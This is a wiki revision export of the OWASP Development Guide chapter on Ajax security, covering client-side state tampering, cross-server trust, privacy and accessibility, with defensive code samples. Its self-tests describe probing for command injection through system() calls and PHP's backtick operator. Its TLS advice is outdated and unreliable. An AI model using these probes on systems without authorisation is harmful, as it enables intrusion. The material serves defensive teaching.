Any system that silently processes transactions using a single submission is dangerous to the client. For example, if a normal web application allows a simple URL submission, a preset session attack will allow the attacker to complete a transaction without the user’s authorization. In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, so an injected attack script may be able to steal money from the client without authorization. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
Determine if the application:&lt;br /&gt;
&lt;br /&gt;
* Is vulnerable to DOM injection and can run arbitrary JavaScript&lt;br /&gt;
&lt;br /&gt;
* Allows execution of loaded JavaScript via URL entry, by navigating to the transaction submission page and then typing javascript:function(args) into the address bar. If the JavaScript is executed, it is likely that spyware will also be able to execute this code via the DOM model&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that all transactions are conducted with appropriate authorization, including transaction signing as necessary.&lt;br /&gt;
&lt;br /&gt;
==Untrusted or absent session data ==&lt;br /&gt;
&lt;br /&gt;
A common mis-implementation with Ajax is the desire to call a second server. &lt;br /&gt;
&lt;br /&gt;
[[Image:Ajax Second Server.gif]]&lt;br /&gt;
&lt;br /&gt;
Session data on the first server usually contains relatively trustworthy authentication and authorization information, as well as sensitive state, but in general, the second server cannot access this information in a timely or safe fashion. &lt;br /&gt;
&lt;br /&gt;
An example includes running an Ajax application on &amp;lt;u&amp;gt;http://www.example.com&amp;lt;/u&amp;gt;, and the Ajax code is able to directly process share trades on &amp;lt;u&amp;gt;http://market.somebiginvestmentfirm.com/&amp;lt;/u&amp;gt; via the use of embedded trust or embedded credentials. &lt;br /&gt;
&lt;br /&gt;
Attackers will be able to fraudulently perform transactions if there is no shared state between the two systems. This attack only requires that the attacker can tamper with embedded state on the client, and that market.somebiginvestmentfirm.com foolishly trusts calls from Ajax callers without first checking with example.com. However, if example.com is simply one of hundreds of brokers, then this scenario is very unlikely to be secure no matter how it’s sliced or diced. This particular scenario requires federated identity, which is discussed further in the Authentication chapter.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
You are vulnerable to this issue if:&lt;br /&gt;
&lt;br /&gt;
* Sensitive state is passed through the client to the second server in the foolish hope it will be trusted by the second server&lt;br /&gt;
&lt;br /&gt;
* The Ajax endpoints are hosted on a different server with unsharable session state&lt;br /&gt;
&lt;br /&gt;
* The second server is addressed by a URL that prevents the cookies from the first session being used by the second server. Most browsers do not allow an application running on &amp;lt;u&amp;gt;ws.example.com&amp;lt;/u&amp;gt; to read cookies from &amp;lt;u&amp;gt;www.example.com&amp;lt;/u&amp;gt;. Browsers will allow cookies to be read from &amp;lt;u&amp;gt;http://example.com&amp;lt;/u&amp;gt;, but you should not rely on this, as an attacker may spoof another host, such as attack.example.com, and set cookies for example.com. &lt;br /&gt;
&lt;br /&gt;
* The web service or other endpoint cannot obtain data from the first server’s session state for any other reason (such as incompatible technologies – for example, a PHP web application whose Ajax code is trying to consume ASP.NET web services).&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
There are at least three methods to get around this issue:&lt;br /&gt;
&lt;br /&gt;
* Do not host the receiving end point on a different server; simply scale the entire application up (web services and all) on the same host. This allows trivially easy access to the trusted session state.&lt;br /&gt;
&lt;br /&gt;
* Stash the state in a database, and pass a cryptographically strong random key from the first server to the second server via the client. This method is far slower, more code intensive, and less scalable than the first solution.&lt;br /&gt;
&lt;br /&gt;
* Use federated authentication to provide a shared authorization context and verify it on the second server. This is usually very slow, but it is safe as long as the single sign-on (SSO) implementation is relatively secure and does not allow replay attacks.&lt;br /&gt;
&lt;br /&gt;
A solution that will not work is to simply pass the sensitive state via the client. A hostile client can tamper with the username, role, or any other sensitive state, so it cannot be trusted to transmit such data safely.&lt;br /&gt;
&lt;br /&gt;
==State management ==&lt;br /&gt;
&lt;br /&gt;
The DOM is designed to be manipulated and visible within the browser. It was never designed to be a secure storage area, but rather as a method of controlling how the page looks and behaves. Therefore, secure applications need to take care with client side storage of secure state.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
==Tamper resistance  ==&lt;br /&gt;
&lt;br /&gt;
If state is stored on the client, the attacker is able to easily manipulate this state using a DOM inspection tool, or simply by re-writing to their own API. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable: '''&lt;br /&gt;
&lt;br /&gt;
* Use DOM inspection tools like FireBug (https://addons.mozilla.org/firefox/1843/) – can you see client side state?&lt;br /&gt;
&lt;br /&gt;
* Can you change the state?&lt;br /&gt;
&lt;br /&gt;
* Use proxy tools, such as Paros, Spike Proxy, or WebScarab. When you see client-side state, can you modify it or inject interesting traffic? Does the server-side code detect the change in a reasonable way? &lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Do not bother obfuscating client-side state – obfuscation requires more code and is trivially bypassed by advanced attackers&lt;br /&gt;
&lt;br /&gt;
* Applications should maintain a copy of all client-side state, and only accept back state that the user is authorized to change, such as form fields or settings which they can change in the web UI&lt;br /&gt;
&lt;br /&gt;
* Ensure that the action is authorized before performing any activity on submitted data&lt;br /&gt;
&lt;br /&gt;
* Include server-side validation, preferring whitelisting to blacklisting.&lt;br /&gt;
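&lt;br /&gt;
The second countermeasure – keep a server-side copy and accept back only what the user may legitimately change – can be sketched in Node-style JavaScript (the names are illustrative):&lt;br /&gt;
&lt;br /&gt;
```javascript
// Merge client-submitted state into the authoritative server copy,
// accepting only the fields the user is authorized to edit.
function mergeClientState(serverState, clientState, editableFields) {
  const merged = { ...serverState };
  for (const field of editableFields) {
    if (Object.prototype.hasOwnProperty.call(clientState, field)) {
      merged[field] = clientState[field];
    }
  }
  return merged; // tampering with non-editable fields is discarded
}
```
&lt;br /&gt;
Tampering with a role or balance on the client is silently discarded; only the whitelisted form fields survive the merge.&lt;br /&gt;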
&lt;br /&gt;
==Privacy  ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax clients use XMLHttpRequest with GET requests. These embed the data in the “URL”, and even though the data is generally not visible to the user, it is available in the browser history. &lt;br /&gt;
&lt;br /&gt;
Phishers favor GET requests because they can embed them in links in e-mails. If coupled with poorly written code that does not assert authorization, such links allow a phisher to commit an unauthorized transaction.&lt;br /&gt;
&lt;br /&gt;
Even if POSTs are used, private data can be cached in intermediate untrusted caches if the application uses HTTP rather than HTTPS connections. &lt;br /&gt;
&lt;br /&gt;
Most browsers have GET data limits, which can be as little as 2 KB. POSTs do not have this limitation, allowing far more data to be sent in any one request. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are at risk '''&lt;br /&gt;
&lt;br /&gt;
* Use a proxy tool, like Paros, Spike, or WebScarab to determine the mode of the Ajax interaction. If it is GET, you are potentially at risk.&lt;br /&gt;
&lt;br /&gt;
* Look at the data – does it contain details such as usernames, passwords, names, addresses, medical history, bank account, tax, or other private details? If so, you are at risk.&lt;br /&gt;
&lt;br /&gt;
* If you are sending sensitive data, can you access the Ajax endpoint via HTTP? If so, you are at risk from privacy breaches.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Generally, regardless of data value, use only POST requests. &lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode client example''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
var cp = new cpaint();&lt;br /&gt;
cp.set_transfer_mode('POST');&lt;br /&gt;
…&lt;br /&gt;
cp.call('processCreditCard.php', 'setCCDetail',&lt;br /&gt;
        document.getElementById('creditcardnumber'),&lt;br /&gt;
        document.getElementById('creditcardexpiry'),&lt;br /&gt;
        document.getElementById('ccv'));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode server example''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
function setCCDetail($cc, $expiry, $ccv)&lt;br /&gt;
{&lt;br /&gt;
    // check that the session is logged in&lt;br /&gt;
    assert_login();&lt;br /&gt;
&lt;br /&gt;
    // check that the user has the USER role to prevent&lt;br /&gt;
    // guest and admin access&lt;br /&gt;
    assert_role('USER');&lt;br /&gt;
&lt;br /&gt;
    // Validate data and business rules&lt;br /&gt;
    if ( is_credit_card($cc) &amp;amp;&amp;amp; is_expiry_date($expiry) &amp;amp;&amp;amp; is_numeric($ccv) )&lt;br /&gt;
    {&lt;br /&gt;
        // Set the credit card details&lt;br /&gt;
        $this-&amp;gt;cc  = $cc;&lt;br /&gt;
        $this-&amp;gt;exp = $expiry;&lt;br /&gt;
        $this-&amp;gt;ccv = $ccv;&lt;br /&gt;
        return true;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    // Data failed validation and business rules&lt;br /&gt;
    return false;&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Include server-side code that enforces the source of the data, so that it only comes from the POST, not from the request, GET, environment, or cookie data.&lt;br /&gt;
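&lt;br /&gt;
As a sketch of this rule in Node-style JavaScript (the request shape is an Express-style assumption, and postParam is an invented name), a handler that reads only the POST body cannot be fed parameters through a phisher-supplied query string:&lt;br /&gt;
&lt;br /&gt;
```javascript
// Read parameters only from the POST body; anything arriving via the
// query string, cookies, or environment is deliberately ignored.
function postParam(req, name) {
  const body = req.body === undefined ? {} : req.body;
  if (Object.prototype.hasOwnProperty.call(body, name)) {
    return body[name];
  }
  return undefined;
}
```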
&lt;br /&gt;
If data transiting Ajax endpoints is protected by privacy laws, ensure that the data transits only over HTTPS using SSLv3 or TLS 1.0 or better, and block plain HTTP communications.&lt;br /&gt;
&lt;br /&gt;
==Proxy Façade  ==&lt;br /&gt;
&lt;br /&gt;
Many toolkits, particularly PHP toolkits, allow you to register a class or file with the Ajax toolkit and then call its methods. CPaint, for example, works in this manner. However, some toolkits are worse than others – they allow '''any''' in-context PHP function to be called, including system() and eval(). Others are not robust against PHP code injection – see below for more details.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If your toolkit works by registering classes or functions, try:&lt;br /&gt;
&lt;br /&gt;
* Calling a system call, such as system() or printf()&lt;br /&gt;
&lt;br /&gt;
* Calling another function in your code, but one which has not been registered&lt;br /&gt;
&lt;br /&gt;
* Trying language features, such as PHP’s backtick (`) shell-execution operator &lt;br /&gt;
&lt;br /&gt;
If any of these attacks work, your code (and any code using this framework) is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
In general, such methods of calling server side code are fraught with danger. It’s better to provide a limited interface, called a proxy façade, to only allow access to permitted functions. &lt;br /&gt;
&lt;br /&gt;
This would also allow authorization checks and basic validation to be performed before calling previously internal code. &lt;br /&gt;
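&lt;br /&gt;
A proxy façade can be as small as an explicit dispatch table, sketched below in Node-style JavaScript with illustrative names. Only functions deliberately registered in the table are reachable from the client; unregistered internals, eval(), and system() simply do not exist behind the façade.&lt;br /&gt;
&lt;br /&gt;
```javascript
// Proxy façade sketch: an explicit dispatch table of the only
// functions a client may invoke.
const facade = {
  calculateTax(amount) {
    if (typeof amount === 'number') {
      if (amount > 0) return amount * 0.075;
    }
    return -1; // failed validation or business rules
  },
};

// Dispatch a client request by name. Anything not registered in the
// table is rejected before any code runs.
function dispatch(name, args) {
  if (!Object.prototype.hasOwnProperty.call(facade, name)) {
    throw new Error('unknown function: ' + name);
  }
  return facade[name](...args);
}
```
&lt;br /&gt;
Note the hasOwnProperty check: without it, names inherited from Object.prototype (toString and friends) would also be callable.&lt;br /&gt;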
&lt;br /&gt;
==SOAP Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XMLRPC Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DOM Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XML Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==JSON (JavaScript Object Notation) Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Encoding safety ==&lt;br /&gt;
&lt;br /&gt;
Ajax applications are particularly prone to encoding attacks as JavaScript understands several encodings (depending on the browser, locale and code page), whilst the scripting language itself is primitive when it comes to providing robust encoding and decoding utilities. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Do not rely upon JavaScript on the client to perform encoding or decoding. Send data pre-encoded to the client, and receive data from the client and handle it correctly on the server. &lt;br /&gt;
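&lt;br /&gt;
One concrete server-side check in this area, sketched here with an invented name, is to decode incoming data exactly once and reject anything that still looks percent-encoded – the classic signature of a double-encoding attack:&lt;br /&gt;
&lt;br /&gt;
```javascript
// Decode exactly once on the server, then reject anything that still
// contains percent-escapes: the caller has layered encodings to slip
// a second decode past validation.
function isDoubleEncoded(value) {
  const once = decodeURIComponent(value);
  return /%[0-9A-Fa-f]{2}/.test(once);
}
```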
&lt;br /&gt;
For more details, see the Canonicalization chapter later in this book.&lt;br /&gt;
&lt;br /&gt;
==Auditing ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Accessibility ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax toolkits and applications are inaccessible. Rarely do they pass even basic W3C WAI validation, and few provide accessible alternative paths. Some toolkits, such as Tibco General Interface, crash the browser if a larger text size is chosen. This is completely unacceptable and, worse, completely preventable. Offering a “rich” interface does not excuse ignoring disability requirements. Based upon the 2000 US Census, around 19.1% of the total US population has a disability of some kind (with similar levels elsewhere in the world). Locking out nearly 20% of your potential users is unacceptable and, in fact, illegal in most countries. &lt;br /&gt;
&lt;br /&gt;
Nearly all Western disability discrimination laws are the same – they require accessibility unless it is a justifiable hardship. They do not distinguish between open source or closed source, for profit or charitable, government or corporate – their application is universal.&lt;br /&gt;
&lt;br /&gt;
The techniques for creating accessible applications are widely known and have been documented for more than ten years. Accessibility evaluation tools are included or available as an option in every web development environment. As it does not cost a great deal to write new software to be accessible (the primary cost is in the testing), it is never a justifiable hardship to be accessible. &lt;br /&gt;
&lt;br /&gt;
Over the last few years, case law has firmly solidified on the side of the disabled (see the references, particularly the SOCOG / IBM decision). Deliberately writing inaccessible software today is negligent in the same way as constructing new buildings without accessibility aids such as ramps and lifts for wheelchair access. This is not rocket science, it does not cost a lot of money to do, and lastly, you may need it one day.&lt;br /&gt;
&lt;br /&gt;
'''How to identify if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
* Read the W3C WAI guidelines and ensure your application has alternate accessible paths, and adheres to basic accessibility guidelines.&lt;br /&gt;
&lt;br /&gt;
* Identify suitable evaluation tools for your development environment if it does not already contain them. Fix issues found by these tools and re-test.&lt;br /&gt;
&lt;br /&gt;
* Try the basic accessibility tools built into your operating system: check that your code works in high contrast and with different color schemes; resize the text elements in your browser (use Control-+ in Firefox, Text Size -&amp;gt; Larger in Internet Explorer 6.0, or the zoom control at the bottom right of the screen in IE 7); on Windows, set the font resolution to high DPI to emulate large fonts; choose big default fonts in the browser; use the screen magnification tool; and test with various basic screen readers. If your application fails any of these tests, you are vulnerable. &lt;br /&gt;
&lt;br /&gt;
* Once you are satisfied your application should have a reasonable shot at passing full testing, identify suitable accredited accessibility test firms or similarly qualified resources who can test your application using actual disability tools and provide qualified feedback. In general, unless your application is very simple, you should fix any issues found.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Develop with accessibility in mind. Just like security, the sooner you do it, the cheaper this activity becomes and the more likely your application will be accessible.&lt;br /&gt;
&lt;br /&gt;
* Test in house regularly. If possible, employ staff or volunteers who require such accessibility; they will let you know the best choices for full-featured screen readers, Braille devices, magnification, and other accessibility aids. Let them test your application and provide feedback. &lt;br /&gt;
&lt;br /&gt;
* If you are likely to sell to corporate or government organizations, ensure that all applications are tested by an accredited accessibility testing firm. Fix all the issues they identify.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
AJAX Spell Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/13986/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
CPaint Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14565/discuss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
XML-RPC Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14088/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maguire vs SOCOG/IBM, Nublog&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.contenu.nu/socog.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
W3C, Existing accessibility tools&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w3.org/WAI/ER/existingtools.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
US Census 2000: Disability Status 2000&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.census.gov/prod/2003pubs/c2kbr-17.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;br /&gt;
[[Category:AJAX]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59646</id>
		<title>Ajax and Other &quot;Rich&quot; Interface Technologies</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59646"/>
				<updated>2009-04-29T12:21:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control: Authentication and Authorization */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
'''''Style is time’s fool. Form is time’s student – Stewart Brand '''''&lt;br /&gt;
&lt;br /&gt;
Ajax applications, often styled as “Web 2.0”, are not a form of magic security pixie dust. Instead, there are two classes of applications: secure and insecure. This is independent of the use of Ajax or similar technologies that preceded it, such as Flash, applets, or ActiveX. With some effort, Ajax applications can be secure. Unfortunately, many are not, which is the '''''raison d’être''''' of this chapter.&lt;br /&gt;
&lt;br /&gt;
The acronym AJAX stands for Asynchronous JavaScript and XML. The technologies underpinning Ajax are not new – they first appeared in 1998 with Microsoft Outlook Web Access in Exchange Server 5.5. “Web 2.0” was defined by Tim O’Reilly to mean highly peer-to-peer dynamic applications. Such applications include del.icio.us, which lets users share the details of their bookmark libraries, and Flickr, which lets users share their photos in a highly interactive way. We define “Ajax applications” as those that use the XMLHttpRequest object to asynchronously call the server and receive replies, regardless of how they handle or display the received data, and regardless of whether they are public, low-value, peer-to-peer applications such as forum software, or handle highly sensitive private data, such as a tax return lodgment application.&lt;br /&gt;
&lt;br /&gt;
Ajax enabled applications aim to increase the interactivity and richness of the web interface. Secure Ajax applications are achievable at minimal cost increase as long as security is considered during design and tested throughout development. &lt;br /&gt;
&lt;br /&gt;
Compliance with disability laws is mandatory for all government and most corporate organizations. Ajax framework developers who wish their frameworks to be adopted by these types of organizations must ensure their code supports common accessibility aids. Ajax framework users should select frameworks that produce accessible output, design their applications to be accessible, and test regularly. In most countries, to do otherwise is simply deliberate negligence, and is often harshly punished by the courts. &lt;br /&gt;
&lt;br /&gt;
Ajax applications face '''''exactly the same '''''security issues as all other web applications, plus they add their own particular set of risks that must be correctly managed. By their complex, bidirectional, and asynchronous nature, Ajax applications increase attack surface area. &lt;br /&gt;
&lt;br /&gt;
Use of Ajax (or any rich interface) requires careful consideration of architecture, server-side access control, state management, and strong validation to prevent attacks. Without considering these basic controls, even brochure-ware websites, such as car manufacturer websites, can be a hazard to both the user and the web site owner’s reputation and thus sales.&lt;br /&gt;
&lt;br /&gt;
At the time of writing, there is a multitude of Ajax frameworks and add-ons, with many more being written every day. Users of Ajax frameworks should ensure that their chosen framework addresses the security risks of their particular application, and does not impose an unsecurable architecture upon them. &lt;br /&gt;
&lt;br /&gt;
Developers of Ajax frameworks should investigate the controls presented in this chapter, and associated controls documented throughout the rest of this book to ensure that their approach is simple, accessible, and secure.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that Ajax applications (and all “rich” interactive interfaces, such as Flash and Shockwave) have adequate:&lt;br /&gt;
&lt;br /&gt;
* Secure Communications&lt;br /&gt;
&lt;br /&gt;
* Authentication and Session Management&lt;br /&gt;
&lt;br /&gt;
* Access Control &lt;br /&gt;
&lt;br /&gt;
* Input Validation&lt;br /&gt;
&lt;br /&gt;
* Error Handling and Logging&lt;br /&gt;
&lt;br /&gt;
To prevent applications from being attacked using known attack vectors, such as unauthorized access, injection attacks, and so on.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
* All Server Platforms&lt;br /&gt;
&lt;br /&gt;
* Web applications which use Ajax, ActiveX, Flash or Shockwave&lt;br /&gt;
&lt;br /&gt;
* Clients which are required to use such applications&lt;br /&gt;
&lt;br /&gt;
==Architecture ==&lt;br /&gt;
&lt;br /&gt;
Appropriate security architecture should be considered when implementing Ajax front ends. Some Ajax frameworks, such as Tibco General Interface and Atlas (an Ajax framework for .NET), proudly advertise that they are 100% client based, with no server-side controls. &lt;br /&gt;
&lt;br /&gt;
Strong security architecture provides adequate defense in depth, and architecturally correct placement of key security controls. For more details, see the Security Architecture chapter.&lt;br /&gt;
[[Category:FIXME|I wanted to make Security Architecture a link, but I am not sure what section it refers to]]&lt;br /&gt;
&lt;br /&gt;
For some types of applications, such as brochure-ware and non-interactive applications like stock tickers, this is acceptable security architecture as the risks are low – it would be hard to circumvent the security controls in a way that loses actual money. However, as the risk of the application increases, the threats and countermeasures required also increase. &lt;br /&gt;
&lt;br /&gt;
'''Architecture by example '''&lt;br /&gt;
&lt;br /&gt;
For the purposes of this section, irs.gov.ex, a taxation department of a fictitious country, has decided to implement an Ajax enabled electronic lodgment and tracking service for all of its 100 million taxpayers. A key reason to move to the new system is to reduce the workload on existing staff for the 90+% of tax returns that could be processed automatically … as long as the taxpayers do not deliberately lie, deceive, or cheat the system. Which of course, they do regularly. &lt;br /&gt;
&lt;br /&gt;
They bought a fancy new Enterprise Service Bus (ESB), to which they hooked up their old but incredibly reliable mainframe backend, their SAP R/3 implementation that writes the checks and tax invoices, and several other key systems. &lt;br /&gt;
&lt;br /&gt;
This particular ESB, like many on the market today, has no data validation, authentication, or authorization controls of its own; it is a simple web-service integration layer. The ESB expects that the underlying systems will perform adequate validation and authorization to prevent abuse, as the software company that wrote the ESB expected that all calling systems would be trusted, internal systems. Hooking up a dynamic web site where the users are known to be relentless, eager, and motivated tax avoiders changes the risk profile of a previously internal system with trusted staff.&lt;br /&gt;
&lt;br /&gt;
The tax department does not want to change existing systems as they are in production and stable. More to the point, they cannot change their mainframe code easily - their skilled mainframe programmers either were promoted to senior management or retired 15 years ago, and it would be extremely costly to hire new mainframe developers, and impossible to change how the third party systems work, like SAP or their anti-fraud system. &lt;br /&gt;
&lt;br /&gt;
Old code, such as COBOL CICS transactions, or previously internal only systems such as SAP R/3, have a different trust model than highly dynamic Internet connected websites. It is highly likely such systems have never been tested against now common attacks, such as HTML injection (XSS), DOM injection, XML query attacks, or similar. Without any intermediate code to protect these older systems, they are at immense risk.&lt;br /&gt;
&lt;br /&gt;
The tax department selected a simple solution in the belief it will save money. In this first example, the bulk of the business logic is contained in deployed JavaScript applications. All of the business logic, validation, and state are contained in the client’s browser, and it makes direct calls to the enterprise service bus. &lt;br /&gt;
&lt;br /&gt;
However, this model is simply broken: the previously generic process orchestration service will need to become far more aware of the caller’s identity (to provide authentication and enforce authorization), maintain secure state, and provide validation services that have previously been performed on the client. &lt;br /&gt;
&lt;br /&gt;
[[Image:Insecure Security and state maintained on the client.gif]]&lt;br /&gt;
&lt;br /&gt;
This security model is akin to leaving the keys to the Reserve Bank at the train station notice board. There is no method of protecting this model without significant replication of the business logic and re-validating all the state at the enterprise service bus, or similar web service endpoints. &lt;br /&gt;
&lt;br /&gt;
Many enterprises, including irs.gov.ex, have taken to service oriented architecture (SOA), which uses web services enabling re-use of pre-existing transactions and systems, such as SAP or Siebel, or custom transactions running on mainframes. If an Ajax framework is connected to such SOA endpoints, such as an enterprise service bus, or directly to a backend data warehouse or other persistent store, there is no ability to validate the calling identity, authorize the transaction, validate the data, or any other normal security activity. So this model will not do. &lt;br /&gt;
&lt;br /&gt;
In the next model, which is how most PHP application frameworks work today, the Ajax xmlrpc endpoint is not necessarily well integrated with the main application. &lt;br /&gt;
&lt;br /&gt;
[[Image: Insecure Ajax Web Service Endpoint separate from the main application.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, if the Ajax endpoint cannot or does not access secure state, or associate the call with the active session, a hostile caller could emulate an active session and call protected resources with minimal skills or tools. This vulnerability has already been demonstrated with several popular Ajax PHP toolkits on Bugtraq, and probably applies to other less well-known toolkits for other languages and platforms.&lt;br /&gt;
&lt;br /&gt;
The best way to protect both of these models is to bring them back to the normal three-tier application model:&lt;br /&gt;
&lt;br /&gt;
[[Image: Better Shared business logic in the middle tier with different front ends.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, which is akin to how GMail works, the application is still significantly Ajax enabled, and provides a rich experience to the user. However, this code is backed by:&lt;br /&gt;
&lt;br /&gt;
* A solid session management scheme to ensure that authentication and authorization is performed in a trusted part of the architecture&lt;br /&gt;
&lt;br /&gt;
* Data validation is performed in both directions on the server-side at various layers to limit or prevent injection and other attacks&lt;br /&gt;
&lt;br /&gt;
* All calls to the backend services are performed by trusted server-side business logic&lt;br /&gt;
&lt;br /&gt;
* The layered architecture allows reasonable trust of the caller at the ESB level as the data has been significantly authorized and validated&lt;br /&gt;
&lt;br /&gt;
This means that the ESB and its published services, such as 40 year old COBOL code, do not need to be particularly aware of the implications of being made available to the Internet. This enables higher levels of re-use and reduces costs.&lt;br /&gt;
&lt;br /&gt;
Although this architecture is more complex for the project implementing the Ajax enabled application, for the funding business it is the cheapest way of maintaining security whilst avoiding updating or maintaining ancient or third party code.&lt;br /&gt;
&lt;br /&gt;
Selecting the correct architecture is unfortunately not a checklist – it is a balance of risk versus cost. However, as demonstrated in this section, client-side heavy architecture models are completely untrustworthy for transactional systems and should be avoided.&lt;br /&gt;
&lt;br /&gt;
==Access control: Authentication and Authorization ==&lt;br /&gt;
[[Category:FIXME|Starting here, should these sections be part of this article? Or do they go somewhere else with links here?]]&lt;br /&gt;
&lt;br /&gt;
Ajax code uses the XMLHttpRequest object, which will send the cookies of the current browser context through with each request. For applications which have user sessions, it is vital that normal authentication paths are used to ensure that the caller is known to the application. Brochure-ware applications can skip this section as they allow anonymous calling.&lt;br /&gt;
&lt;br /&gt;
